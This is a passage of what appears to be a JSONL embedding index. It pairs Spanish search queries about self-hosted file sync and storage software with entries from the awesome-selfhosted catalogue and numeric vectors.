extensible [AGPL-3.0, Nodejs/Docker]. Pydio β€” Turn any web server into a powerful file management system and an alternative to mainstream cloud storage providers [AGPL-3.0, Go]. Samba β€” Samba is the standard Windows interoperability suite of programs for Linux and Unix. It provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol [GPL-3.0, C]. Seafile β€” File hosting and sharing solution primary for teams and organizations [GPL-2.0/GPL-3.0/AGPL-3.0/Apache-2.0, C]. Sync-in β€” File storage, syncing, sharing, and collaboration with real-time editing, permission management, and desktop/CLI clients [AGPL-3.0, Nodejs/Docker].", "indexar": "cual es una alternativa libre a los servicios de almacenamiento en la nube tradicionales?", "v": [0.06919, -0.00251, -0.12408, -0.01954, -0.08154, 0.02719, -0.03912, -0.06393, -0.16669, -0.07307, -0.12116, -0.194, -0.0451, 0.04277, -0.06445, -0.03141, 0.0378, -0.11835, 0.1108, 0.05377, -0.09423, -0.01741, -0.17322, 0.02144, -0.07641, -0.088, 0.06043, 0.02631, -0.12058, 0.0653, 0.0294, -0.01879, 0.07815, -0.06121, -0.0247, 0.04219, 0.09862, 0.07005, -0.11599, -0.1201, 0.04756, -0.08772, -0.02345, 0.14206, -0.05846, -0.08486, -0.0599, 0.0226, 0.0257, 0.05614, -0.07648, -0.02203, -0.03632, 0.0324, 0.04468, -0.02007, 0.06308, -0.05555, -0.07484, -0.03003, -0.13194, 0.12816, 0.05371, -0.0859, 0.11658, 0.00363, -0.06242, 0.07769, -0.13052, 0.04834, 0.0799, 0.05583, 0.01182, -0.04164, -0.08146, 0.11241, 0.01606, 0.02059, -0.05996, 0.05535, -0.00015, 0.05511, 0.02152, 0.04199, -0.09493, -0.08024, 0.03368, -0.0955, -0.00682, 0.05402, 0.0635, 0.03679, 0.03806, 0.15723, 0.00222, -0.03023, 0.02837, 0.12528, -0.03244, 0.04837, 0.11893, 0.13514, -0.02297, 0.02, -0.00844, -0.00585, 0.0552, -0.03354, -0.02099, 0.01328, 0.03617, 0.03424, 0.03117, 0.05583, -0.02774, -0.01582, 0.00828, -0.06724, 0.00278, 0.07478, -0.02655, -0.02421, 0.03828, -0.00143, 0.05558, 0.00633, -0.02533, 0.03487, -0.10878, 0.01811, 0.00396, -0.03885, 0.00412, 0.00172, 0.02358, -0.06537, 0.00593, -0.09843, 0.07666, -0.00704, 0.05369, -0.03717, -0.01592, -0.01451, 0.06893, -0.06656, 0.08808, -0.00324, -0.01239, -0.0637, -0.06625, 0.03464, -0.08807, 0.0705, -0.07753, 0.06247, -0.10046, -0.08061, -0.14597, 0.08278, 0.10282, -0.03179, -0.00209, 0.02615, -0.0527, -0.03027, 0.01326, -0.01178, -0.01434, 0.03317, -0.03285, 0.00762, -0.02098, -0.10281, 0.05788, 0.03785, 0.0166, -0.09797, 0.12071, -0.01176, -0.04637, -0.00089, -0.09086, 0.066, -0.00021, -0.06538, -0.00689, -0.00396, -0.00207, 0.04542, -0.03706, -0.0156, -0.09591, -0.04113, -0.011, -0.0606, -0.0663, -0.03512, -0.03674, 0.01764, -0.0938, 0.06608, -0.07322, -0.05101, -0.08337, 0.01392, -0.05901, 0.05733, -0.00574, 0.03835, -0.00805, -0.00621, 0.05823, -0.06477, -0.04579, -0.01835, 0.02888, -0.06297, -0.00547, -0.02266, -0.00806, -0.02077, 0.02642, -0.04187, -0.03569, 0.02431, 0.06483, 0.11304, -0.00627, -0.01576, -0.01265, 0.00457, -0.01635, -0.00332, 0.04584, 0.0367, 0.0091, -0.01469, -0.02391, -0.00764, 0.01984, 0.08036, -0.07907, 0.01813, -0.052, 0.00463, -0.12026, 0.02112, 0.00621, -0.0224, -0.03946, 0.08178, 0.04251, -0.02758, 0.02353, -0.03578]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Peergos β€” Secure and private space online where you can store, share and view your photos, videos, music and documents. Also includes a calendar, news feed, task lists, chat and email client [AGPL-3.0, Java]. Puter β€” Web-based operating system designed to be feature-rich, exceptionally fast, and highly extensible [AGPL-3.0, Nodejs/Docker]. Pydio β€” Turn any web server into a powerful file management system and an alternative to mainstream cloud storage providers [AGPL-3.0, Go]. Samba β€” Samba is the standard Windows interoperability suite of programs for Linux and Unix. It provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol [GPL-3.0, C]. Seafile β€” File hosting and sharing solution primary for teams and organizations [GPL-2.0/GPL-3.0/AGPL-3.0/Apache-2.0, C]. Sync-in β€” File storage, syncing, sharing, and collaboration with real-time editing, permission management, and desktop/CLI clients [AGPL-3.0, Nodejs/Docker].", "indexar": "con que puedo montar un sistema de gestiΓ³n de archivos potente basado en cualquier servidor web?", "v": [0.02777, 0.01572, -0.16365, -0.19506, -0.15715, -0.03574, 0.03703, -0.07371, -0.12193, -0.14586, -0.11467, 0.02581, 0.04379, -0.0186, 0.03484, 0.10996, 0.11713, -0.17367, 0.02878, -0.01714, -0.01183, -0.04723, 0.04139, -0.09597, -0.01499, 0.00394, 0.07543, -0.06544, -0.13325, -0.02575, -0.02921, 0.05474, 0.03806, 0.01252, -0.00886, -0.04918, -0.06, 0.14737, -0.07022, 0.02694, -0.00508, -0.03259, -0.05654, 0.06458, 0.03055, -0.01711, 0.1142, -0.1295, 0.0885, -0.06242, -0.09612, -0.1348, -0.1674, -0.02777, -0.0023, -0.0736, 0.07876, -0.12822, 0.05762, -0.07076, -0.09209, 0.14504, -0.01601, -0.02995, 0.02071, 0.0327, -0.01793, -0.03345, -0.12033, 0.02828, -0.03938, -0.01992, 0.03666, 0.01583, 0.05294, 0.03236, 0.05738, 0.0292, -0.01356, 0.04833, 0.05575, -0.00455, -0.07229, 0.13925, -0.09806, -0.05894, 0.01436, -0.08807, 0.05886, -0.00516, 0.09336, -0.02944, -0.04839, 0.01743, 0.02491, -0.05337, 0.10862, 0.00893, -0.00422, -0.06549, -0.05394, 0.06898, -0.02614, 0.12667, 0.12204, 0.08147, 0.10795, -0.04154, 0.08733, -0.08057, 0.00592, -0.02092, -0.03764, 0.04072, -0.10164, -0.04853, 0.02389, 0.02583, -0.01273, 0.02502, -0.06486, 0.0448, 0.02963, -0.01419, 0.08799, 0.00271, 0.12293, 0.0687, -0.02458, -0.02258, 0.03915, -0.0177, -0.07408, 0.00599, -0.00325, 0.00173, 0.01745, 0.07738, -0.0421, -0.02484, -0.02939, 0.05443, -0.0375, -0.00799, 0.13505, -0.01309, 0.08856, -0.08282, -0.04065, -0.02707, 0.00845, 0.00367, -0.02064, -0.03194, -0.15263, 0.00833, 0.02344, -0.09045, -0.07607, 0.04225, 0.00844, 0.08296, -0.0013, 0.12051, -0.02613, 0.01737, -0.07477, 0.05566, 0.02087, 0.00838, 0.00195, 0.05241, 0.03677, -0.02713, 0.04858, -0.00185, -0.10717, -0.1001, 0.04808, 0.02021, -0.03553, 0.00437, -0.0125, 0.07279, -0.03859, 0.03362, 0.01454, 0.02096, -0.04122, 0.02545, 0.06079, 0.0244, -0.05355, 0.04483, 0.05027, -0.04133, -0.08457, -0.02372, 0.00464, -0.02103, -0.04472, -0.05698, -0.01792, -0.03711, -0.04985, -0.0042, 0.01583, 0.03363, 0.0454, 0.06145, -0.02102, 0.01913, 0.08402, -0.07049, -0.02831, -0.01259, 0.03684, -0.05039, -0.00511, -0.05214, -0.0015, 0.01384, 0.06048, 0.04591, 0.03449, 0.0202, -0.01763, -0.01959, 0.03692, -0.05086, -0.03637, -0.0631, -0.00681, 0.00031, -0.00828, -0.06168, 0.01788, -0.00837, -0.07631, -0.05278, 0.00938, 0.10107, 0.02227, -0.01792, -0.01667, -0.09603, -0.02602, -0.01662, -0.02806, -0.06381, -0.02383, 0.01837, -0.01993, -0.02862, -0.01266, 0.00801]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Syncthing β€” Syncthing is an open source peer-to-peer file synchronisation tool [MPL-2.0, Go/Docker/deb]. Unison β€” Unison is a file-synchronization tool for OSX, Unix, and Windows [GPL-3.0, deb/OCaml].", "indexar": "que programa sirve para sincronizar archivos entre diferentes ordenadores", "v": [0.04824, -0.11519, -0.05621, -0.16728, 0.07295, -0.22633, 0.00514, -0.07356, -0.03288, -0.08096, 0.01459, -0.10044, 0.02892, -0.11052, 0.10075, -0.0172, 0.08417, -0.07777, 0.10287, 0.08537, -0.01845, 0.05273, 0.07902, -0.08736, -0.05407, 0.00558, -0.05116, 0.03985, -0.07729, 0.02617, -0.07307, 0.00163, 0.1432, -0.05789, 0.00937, -0.01021, 0.09573, 0.04262, -0.04999, 0.11601, 0.01586, 0.04799, -0.04347, 0.08558, 0.06843, -0.04095, 0.05712, 0.01069, 0.06851, 0.00634, -0.02198, -0.01283, 0.05519, 0.0329, -0.01119, -0.14726, -0.09411, -0.14289, 0.0174, -0.00768, -0.03153, 0.10593, 0.0203, -0.06241, -0.01337, 0.06007, 0.00772, 0.04384, -0.07928, 0.07617, -0.02351, 0.06776, 0.10651, -0.09152, -0.10871, 0.04906, 0.01588, -0.05091, 0.02117, -0.00603, 0.06554, 0.01105, 0.01454, 0.01629, -0.13646, -0.05196, 0.07841, 0.0936, 0.03511, -0.01387, 0.04062, 0.14444, 0.00321, 0.09205, 0.13227, -0.00613, 0.12506, 0.00279, -0.01777, 0.03755, 0.05185, -0.06743, -0.08148, 0.09388, -0.10286, 0.18376, 0.10683, 0.03312, -0.0028, -0.00903, 0.05679, 0.06683, -0.0028, 0.00867, -0.1539, 0.02329, 0.04394, -0.05888, 0.01472, -0.07407, -0.07616, 0.04953, -0.00682, 0.02292, 0.04061, 0.03234, 0.0847, 0.10608, -0.09609, 0.06812, 0.06546, 0.03797, -0.04816, 0.01236, -0.11246, -0.09676, 0.03792, -0.0542, -0.03723, -0.07783, 0.10829, 0.11661, -0.00835, 0.06946, -0.00138, 0.01972, 0.0686, -0.03937, -0.02262, -0.05124, 0.01063, -0.03259, -0.00491, -0.03692, -0.0968, 0.01791, -0.02142, -0.01945, -0.07904, 0.02699, -0.09593, 0.0018, -0.02312, -0.03657, 0.04966, -0.05009, -0.01225, 0.01259, 0.07236, 0.05801, -0.01404, 0.09555, 0.05075, -0.06331, -0.03676, 0.06005, -0.00209, -0.02545, 0.03881, -0.01818, -0.06665, 0.03559, 0.06138, 0.03821, -0.03101, -0.02948, -0.01548, 0.03513, -0.06033, 0.00668, -0.03827, -0.05619, -0.02042, -0.00252, -0.02083, -0.00361, -0.04164, 0.00105, 0.0295, -0.06776, -0.02314, -0.01977, -0.03465, 0.05656, 0.05569, 0.10433, -0.02094, -0.03745, 0.08082, 0.08819, -0.04655, -0.01728, 0.01542, 0.04269, 0.01184, -0.07839, -0.03753, 0.02918, 0.08716, 0.00903, 0.03158, -0.04992, 0.00651, 0.02365, -0.03531, -0.06111, 0.00228, -0.01673, -0.00224, -0.0389, -0.04185, -0.01668, 0.02359, 0.05304, -0.00639, -0.01351, -0.03929, -0.00149, 0.04495, -0.06162, -0.06768, 0.06036, 0.02108, -0.06135, -0.03661, 0.00326, -0.04482, -0.06043, 0.03613, 0.05504, -0.02098, 0.04718, -0.02125, 0.02316, 0.00958, 0.09382]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Syncthing β€” Syncthing is an open source peer-to-peer file synchronisation tool [MPL-2.0, Go/Docker/deb]. Unison β€” Unison is a file-synchronization tool for OSX, Unix, and Windows [GPL-3.0, deb/OCaml].", "indexar": "cual es una alternativa libre de Syncthing que funcione en Mac y Linux", "v": [-0.1544, 0.07672, -0.17133, -0.10284, -0.01885, -0.13983, -0.31975, 0.01937, -0.1444, 0.09324, 0.05605, -0.15833, 0.05423, -0.00165, 0.0634, -0.02935, -0.04926, -0.15227, -0.00771, -0.07479, -0.07084, 0.01221, -0.14858, -0.08377, 0.1064, 0.04408, 0.0552, -0.08139, -0.02677, 0.03881, 0.02703, 0.04868, 0.09568, 0.0837, -0.01415, -0.04485, 0.0472, -0.01731, 0.11149, 0.01465, 0.02622, -0.07453, -0.05137, 0.00397, -0.1035, -0.15617, 0.09179, -0.00195, 0.0188, -0.01807, -0.05917, -0.08974, -0.0666, 0.06199, 0.03838, -0.03461, 0.08389, -0.08712, 0.08966, 0.00361, -0.15799, 0.03177, -0.01979, -0.10248, 0.06714, 0.05662, -0.05826, -0.07295, -0.08375, 0.09611, -0.03887, 0.1114, -0.07671, -0.05625, 0.01832, 0.05067, -0.05983, -0.05034, 0.03701, 0.00787, 0.1175, -0.0653, 0.04148, 0.10362, -0.09212, -0.09001, 0.09959, -0.02726, 0.00468, 0.08651, 0.07199, 0.05684, -0.03902, 0.124, 0.07034, -0.01699, 0.06927, 0.07052, 0.03634, -0.00221, 0.03401, 0.02785, -0.13819, 0.06959, -0.03128, -0.02796, 0.05199, -0.00375, -0.01966, 0.01476, 0.01604, -0.01479, 0.01481, -0.0442, -0.05355, -0.09777, -0.04853, 0.00827, -0.0444, 0.02287, -0.08463, -0.00504, -0.0116, -0.03553, 0.0273, 0.01852, 0.00193, 0.10354, -0.06524, -0.00502, 0.07612, -0.12142, -0.02849, -0.05052, -0.05015, -0.01009, 0.02069, -0.02887, 0.02011, 0.0021, 0.02534, 0.05976, 0.03927, 0.06245, 0.07501, -0.01747, 0.05057, -0.006, -0.02908, -0.05019, -0.04569, 0.02118, -0.01062, -0.01769, -0.10598, 0.01031, -0.05694, -0.01195, -0.03199, -0.00771, -0.01753, 0.01475, 0.02551, 0.03623, -0.06603, -0.01861, -0.02065, 0.00261, -0.02093, 0.01984, -0.02357, 0.08803, 0.02333, -0.08023, -0.01369, -0.08252, -0.00805, -0.0721, 0.09072, 0.01667, 0.04172, 0.03196, -0.0496, -0.02921, 0.00786, 0.01213, -0.05424, 0.04312, -0.01189, 0.05948, 0.01918, 0.00133, -0.0162, -0.07457, -0.05327, 0.02713, -0.00256, -0.06051, -0.01722, -0.00276, -0.11361, 0.0111, -0.00564, -0.01757, 0.03951, -0.00583, -0.05995, 0.0414, 0.00068, 0.03267, 0.01239, 0.03378, 0.10443, -0.00065, 0.00416, 0.01421, 0.0613, 0.00543, 0.04541, -0.00155, 0.03352, -0.01639, 0.03606, -0.01243, -0.01025, -0.04933, 0.03583, 0.04015, -0.00289, 0.00911, 0.02035, 0.00324, -0.02897, 0.00672, -0.01524, 0.02871, 0.02804, 0.04939, 0.00765, -0.03158, 0.0449, 0.09241, -0.03678, -0.06858, -0.03944, -0.03248, -0.08364, -0.01054, -0.03437, -0.06635, -0.03656, 0.02526, 0.02682, -0.0147, 0.0069, 0.00895]} -{"tipo": "pregunta", "herramienta": "File Transfer & Synchronization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer & Synchronization", "tema": "file transfer & synchronization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer & Synchronization: Syncthing β€” Syncthing is an open source peer-to-peer file synchronisation tool [MPL-2.0, Go/Docker/deb]. Unison β€” Unison is a file-synchronization tool for OSX, Unix, and Windows [GPL-3.0, deb/OCaml].", "indexar": "con que herramienta puedo montar la sincronizaciΓ³n de carpetas sin tener un servidor central", "v": [0.04403, -0.07978, -0.21674, -0.13152, -0.0958, -0.15582, 0.01756, 0.10213, -0.04674, -0.04468, -0.15218, -0.02953, 0.03015, -0.09165, 0.1099, 0.15385, 0.0658, -0.13811, 0.0342, 0.03372, -0.00541, -0.07112, 0.10145, -0.06557, -0.11914, 0.11135, 0.08406, -0.08826, -0.16731, 0.03172, 0.01343, 0.07938, 0.10694, 0.08255, 0.01934, -0.17588, -0.10635, 0.07409, -0.11639, -0.00676, -0.01241, 0.07738, -0.0664, 0.07505, 0.00794, -0.00525, 0.06017, -0.06979, -0.02018, 0.03184, -0.05444, -0.19338, -0.1331, -0.09605, -0.023, -0.1536, 0.11705, -0.06677, 0.12716, -0.06931, -0.09697, 0.12908, -0.07154, 0.0136, 0.04683, -0.00582, -0.04642, -0.07044, -0.08602, 0.04943, -0.02251, 0.0012, 0.06122, -0.06739, 0.04863, 0.03691, -0.02082, -0.05914, 0.03213, 0.04291, 0.07407, 0.03026, -0.05453, 0.08337, -0.08754, -0.11861, 0.04775, 0.01059, 0.03082, 0.01735, 0.04789, 0.08448, -0.04711, 0.04626, 0.0597, -0.05392, 0.08958, -0.01327, -0.00649, -0.02759, 0.10684, 0.01978, -0.05103, 0.07045, -0.00385, 0.01681, 0.05838, -0.06061, 0.01646, -0.09345, 0.07428, 0.08209, -0.03418, 0.03509, -0.09884, -0.04859, -0.01656, 0.06039, -0.01966, 0.01255, -0.00702, -0.01442, 0.04776, 0.00057, 0.04046, -0.05758, 0.09279, 0.06437, -0.01128, -0.03868, -0.04687, 0.00142, -0.08349, -0.03091, -0.01443, 0.00211, -0.03499, -0.08947, 0.00429, -0.0774, 0.00528, 0.0044, -0.02504, -0.05625, 0.05579, 0.0518, 0.09573, -0.10149, -0.0446, 0.02604, 0.04566, -0.03662, 0.03514, -0.01251, -0.06807, -0.01451, 0.00372, -0.02326, -0.03683, 0.03232, -0.01778, -0.02578, 0.02192, 0.05893, 0.0372, -0.02083, 0.00633, 0.0421, 0.06453, 0.07278, -0.00346, 0.03047, 0.02753, -0.01775, 0.02641, -0.02634, -0.04648, -0.01527, 0.01628, 0.00749, -0.05093, 0.00585, -0.05848, -0.02295, -0.01672, -0.02625, 0.00396, -0.00994, -0.01091, 0.0108, 0.01992, 0.03083, -0.01835, 0.06767, 0.03277, -0.0733, -0.02052, -0.01407, -0.00813, 0.00735, -0.07662, -0.00719, -0.00928, -0.07274, 0.04014, 0.01571, -0.09657, 0.04267, -0.0234, 0.07869, -0.01986, -0.01507, 0.05743, -0.08501, 0.00028, -0.03824, 0.03533, -0.00252, -0.0277, -0.05519, 0.05212, 0.00973, 0.07667, 0.01016, -0.00161, 0.04138, -0.00633, 0.05284, 0.05748, -0.02788, -0.01919, 0.04004, -0.02175, -0.00366, 0.03233, -0.02392, 0.04293, -0.07228, -0.03318, -0.02857, -0.0352, 0.06838, 0.0099, -0.04359, -0.01508, -0.07758, -0.02581, -0.02814, -0.0263, -0.06427, -0.0141, -0.03267, 0.03587, -0.04778, -0.00018, -0.03617]} -{"tipo": "pregunta", "herramienta": "File Transfer - Object Storage & File Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Object Storage & File Servers", "tema": "file transfer - object storage & file servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Object Storage & File Servers: GarageHQ β€” Geo-distributed, S3‑compatible storage service that can fulfill many needs [AGPL-3.0, Docker/Rust]. Harbor β€” Cloud native image registry that stores, signs, and scans content [Apache-2.0, Docker/K8S]. SeaweedFS β€” SeaweedFS is an open source distributed file system supporting WebDAV, S3 API, FUSE mount, HDFS, etc, optimized for lots of small files, and easy to add capacity [Apache-2.0, Go]. Zenko CloudServer β€” Zenko CloudServer, an open-source implementation of a server handling the Amazon S3 protocol [Apache-2.0, Docker/Nodejs]. ZOT OCI Registry β€” A production-ready vendor-neutral OCI-native container image registry [Apache-2.0, Go/Docker].", "indexar": "que programa puedo usar como almacenamiento de archivos compatible con Amazon S3?", "v": [0.04526, -0.03971, -0.09369, -0.21515, -0.03849, -0.09441, -0.10755, -0.12422, -0.19579, 0.00342, -0.17725, -0.14969, -0.05087, -0.02208, -0.01722, 0.01457, 0.12983, -0.06439, 0.00594, 0.10746, 0.09247, -0.04753, -0.10368, -0.09123, 0.02065, 0.07114, 0.08648, 0.062, -0.15618, -0.052, -0.03815, 0.02379, 0.0991, -0.0447, -0.06737, -0.04186, 0.0294, 0.0369, 0.00185, 0.07359, 0.05381, 0.01861, -0.06662, 0.11872, -0.04908, 0.08178, 0.08615, 0.01425, -0.01415, -0.02118, -0.06555, 0.08924, -0.06184, 0.05589, 0.07284, 0.02027, -0.00382, -0.10874, 0.00133, 0.11828, -0.09627, 0.03692, 0.07952, 0.01789, -0.03713, 0.05704, -0.04952, 0.13819, -0.22902, 0.07631, -0.0125, 0.05264, 0.02787, -0.05469, 0.01081, 0.11818, 0.04314, 0.01188, 0.04938, 0.00058, 0.00841, -0.07816, 0.06051, 0.04323, -0.05645, -0.06055, 0.0174, -0.04075, 0.0324, -0.05082, -0.02646, -0.01931, -0.03095, 0.04186, 0.1163, -0.0949, 0.06125, 0.04242, 0.04999, -0.01352, 0.03259, 0.01527, 0.02996, 0.10179, -0.0065, 0.13077, 0.01415, -0.00137, -0.00252, -0.02196, 0.07363, 0.01925, 0.00408, 0.00141, -0.14085, 0.03818, -0.01505, -0.04627, 0.10248, 0.01011, -0.00157, 0.03898, -0.03593, 0.04245, 0.15778, 0.04889, 0.06614, 0.08795, -0.10606, 0.1058, 0.06518, -0.02585, 0.01687, 0.01342, -0.0248, -0.09458, 0.01666, 0.00205, 0.00263, -0.00169, 0.07072, -0.01702, 0.00487, 0.00105, 0.04711, -0.05628, -0.01951, -0.05316, -0.03016, -0.09163, 0.06806, -0.0095, -0.01771, 0.01058, -0.03361, 0.02067, 0.03453, -0.10689, -0.08939, -0.01865, -0.0454, -0.0041, -0.07275, 0.04596, -0.02818, -0.0598, 0.07247, 0.02534, 0.01215, 0.02782, 0.01662, 0.05388, -0.01194, -0.07042, 0.01192, -0.00418, -0.038, -0.02365, 0.09884, -0.01104, -0.12583, 0.0435, -0.00164, 0.02503, 4e-05, -0.09109, 0.02939, 0.01579, -0.01022, -0.00016, -0.02836, 0.04133, 0.05536, -0.00967, 0.02009, -0.10595, -0.03584, 0.04488, 0.03107, 0.01412, -0.03881, 0.03753, -0.08578, -0.04306, 0.0343, 0.02469, -0.09266, 0.0315, 0.06015, -0.014, -0.03757, -0.05352, 0.1034, -0.00759, -0.0026, -0.04403, -0.00157, 0.04283, 0.04993, -0.00229, 0.02352, 0.07729, 0.04866, 0.02888, -0.03744, -0.08701, 0.02123, -0.01554, -0.02113, -0.02469, -0.0426, 0.05915, -0.00842, -0.00997, 0.04694, -0.01401, -0.00452, -0.01792, 0.00878, -0.01322, -0.07637, 0.06477, -0.02958, 0.01444, -0.0274, 0.03102, -0.07002, -0.00203, -0.00126, -0.02689, -0.00564, 0.04656, 0.01239, -0.05286, 0.04974, 0.03428]} -{"tipo": "pregunta", "herramienta": "File Transfer - Object Storage & File Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Object Storage & File Servers", "tema": "file transfer - object storage & file servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Object Storage & File Servers: GarageHQ β€” Geo-distributed, S3‑compatible storage service that can fulfill many needs [AGPL-3.0, Docker/Rust]. Harbor β€” Cloud native image registry that stores, signs, and scans content [Apache-2.0, Docker/K8S]. SeaweedFS β€” SeaweedFS is an open source distributed file system supporting WebDAV, S3 API, FUSE mount, HDFS, etc, optimized for lots of small files, and easy to add capacity [Apache-2.0, Go]. Zenko CloudServer β€” Zenko CloudServer, an open-source implementation of a server handling the Amazon S3 protocol [Apache-2.0, Docker/Nodejs]. ZOT OCI Registry β€” A production-ready vendor-neutral OCI-native container image registry [Apache-2.0, Go/Docker].", "indexar": "con que puedo montar un registro centralizado para mis imΓ‘genes de contenedores?", "v": [0.27229, 0.07033, -0.10563, -0.08977, -0.03365, -0.07353, -0.02804, 0.115, -0.15617, -0.15889, -0.06103, -0.00859, -0.05354, -0.04384, 0.06528, 0.09663, -0.0338, -0.05228, -0.01647, -0.04061, -0.03057, -0.12305, 0.05997, -0.00099, 0.01168, 0.01882, -0.02307, -0.09226, -0.14045, 0.02656, 0.06841, 0.0963, 0.08997, 0.2076, -0.01958, -0.13695, -0.03296, 0.02462, -0.08405, -0.04154, 0.00528, 0.08932, -0.12297, 0.05713, -0.00166, -0.04216, 0.035, -0.07903, -0.03775, -0.03898, 0.04551, -0.09342, -0.12015, 0.0293, -0.07675, -0.06905, 0.0739, 0.08342, 0.11812, -0.03208, 0.0693, 0.16224, 0.02056, 0.07859, -0.08179, 0.05099, -0.04803, 0.05185, -0.11572, -0.063, 0.03243, 0.00913, 0.07928, -0.11445, 0.0574, 0.0671, -0.03548, -0.02137, -0.0276, 0.02826, 0.03792, -0.0815, 0.01117, 0.02932, -0.03846, -0.0634, -0.03234, -0.02012, 0.04382, -0.04827, 0.05667, -0.00399, 0.03226, 0.03783, 0.02274, -8e-05, 0.01417, 0.01408, -0.01771, 0.06324, 0.04476, 0.09096, -0.00621, 0.06663, 0.05941, 0.01983, 0.1075, -0.12995, 0.0683, -0.12907, 0.00977, 0.04459, -0.07302, -0.02675, -0.1499, -0.00359, -0.03342, 0.00831, 0.07439, -0.04853, -0.01097, -0.03161, 0.0241, -0.02386, 0.03221, -0.04334, 0.00606, 0.04893, -0.07054, 0.05158, -0.07881, 0.04099, -0.0739, -0.06982, -0.02587, -0.03618, -0.01903, -0.02858, 0.01, 0.01299, -0.05902, 0.02924, 0.00851, -0.10964, 0.06478, 0.04804, 0.07378, -0.04258, -0.07488, 0.017, 0.06471, 0.01512, 0.07355, -0.01774, 0.01256, 0.09904, 0.01465, -0.06561, -0.00227, -0.0091, -0.08084, 0.0386, -0.0247, 0.01882, -0.05229, -0.02862, -0.04157, -0.04883, -0.00416, 0.01328, -0.00019, -0.01229, 0.00117, -0.00426, 0.07328, 0.02213, 0.00222, -0.08414, 0.01462, 0.03126, -0.06398, 0.05758, -8e-05, 0.05594, 0.04782, -0.03338, -0.07364, 0.01838, 0.06118, 0.01456, -0.0203, 0.0146, -0.01694, -0.03225, -0.00032, -0.05617, -0.09884, 0.06037, 0.0412, 0.00027, -0.01389, -0.00574, 0.04171, -0.01452, -0.09717, 0.01754, -0.11613, 0.04756, 0.03934, 0.05357, -0.04623, -0.00622, 0.0576, -0.0878, -0.04066, 0.05, -0.01024, -0.01444, -0.08445, -0.01243, -0.05588, 0.04496, 0.07738, 0.00709, 0.00927, 0.00496, 0.02443, 0.06006, 0.04202, 0.02103, -0.05881, 0.08242, -0.02923, -0.03905, 0.05431, 0.03489, 0.0044, -0.03038, -0.05072, -0.09112, -0.00334, 0.05793, -0.02532, 0.01277, -0.00599, -0.04452, -0.07892, 0.05567, 0.05289, -0.09483, 0.01584, 0.02799, 0.01648, -0.0739, 0.01262, -0.07591]} -{"tipo": "pregunta", "herramienta": "File Transfer - Object Storage & File Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Object Storage & File Servers", "tema": "file transfer - object storage & file servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Object Storage & File Servers: GarageHQ β€” Geo-distributed, S3‑compatible storage service that can fulfill many needs [AGPL-3.0, Docker/Rust]. Harbor β€” Cloud native image registry that stores, signs, and scans content [Apache-2.0, Docker/K8S]. SeaweedFS β€” SeaweedFS is an open source distributed file system supporting WebDAV, S3 API, FUSE mount, HDFS, etc, optimized for lots of small files, and easy to add capacity [Apache-2.0, Go]. Zenko CloudServer β€” Zenko CloudServer, an open-source implementation of a server handling the Amazon S3 protocol [Apache-2.0, Docker/Nodejs]. ZOT OCI Registry β€” A production-ready vendor-neutral OCI-native container image registry [Apache-2.0, Go/Docker].", "indexar": "cual es una alternativa libre a los servidores de archivos tradicionales para muchas pequeΓ±as unidades?", "v": [0.13708, 0.06835, -0.05804, -0.02548, -0.13731, -0.0507, 0.05348, -0.13199, -0.07388, -0.04407, -0.08163, -0.06194, 0.02786, 0.0185, 0.06483, -0.10814, 0.13798, -0.10119, 0.21171, 0.00933, -0.02948, 0.00466, -0.05335, 0.03863, -0.07361, -0.05265, 0.06759, 0.01796, -0.12201, 0.05387, 0.08755, 0.09277, 0.08044, -0.07598, -0.03984, 0.01647, 0.02101, 0.18581, -0.12215, -0.10769, 0.12085, -0.01996, -0.12071, 0.03564, -0.06427, -0.03591, -0.0722, 0.07645, 0.02685, 0.01047, -0.11951, -0.01017, -0.0214, 0.05292, -0.0351, -0.05211, 0.00391, -0.04987, -0.06133, 0.02716, -0.11068, 0.14662, 0.05669, -0.04136, 0.02354, 0.0428, -0.10232, -0.01493, -0.08052, -0.0001, 0.02598, 0.06006, 0.00122, -0.13409, -0.10408, 0.15102, -0.0483, -0.03137, 0.00146, 0.07582, 0.10807, -0.03236, 0.01585, 0.05624, -0.08239, -0.09706, 0.02879, -0.05832, 0.00808, 0.00367, 0.03802, 0.01451, -0.00518, 0.11176, 0.04512, -0.06665, 0.06394, 0.01763, -0.0096, 0.0779, 0.04702, 0.02667, -0.04312, 0.03872, 0.04111, 0.06525, 0.03072, 0.02081, 0.00832, -0.04338, 0.02892, 0.02972, 0.01444, 0.0992, -0.10743, 0.02045, -0.03151, -0.05395, -0.01964, 0.00202, -0.07589, 0.02557, 0.05404, 0.01548, 0.03495, -0.08823, 0.04353, 0.00857, -0.03185, 0.01066, 0.08454, -0.03422, -0.06842, -0.03868, -0.12777, 0.01835, 0.16038, 